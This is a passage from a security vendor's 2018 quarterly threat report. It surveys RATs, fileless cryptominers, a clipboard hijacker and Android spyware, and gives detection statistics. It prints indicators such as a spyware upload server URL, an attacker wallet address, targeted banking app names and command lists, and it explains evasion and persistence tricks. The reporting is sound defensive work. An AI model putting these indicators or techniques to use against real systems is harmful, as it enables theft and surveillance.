The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
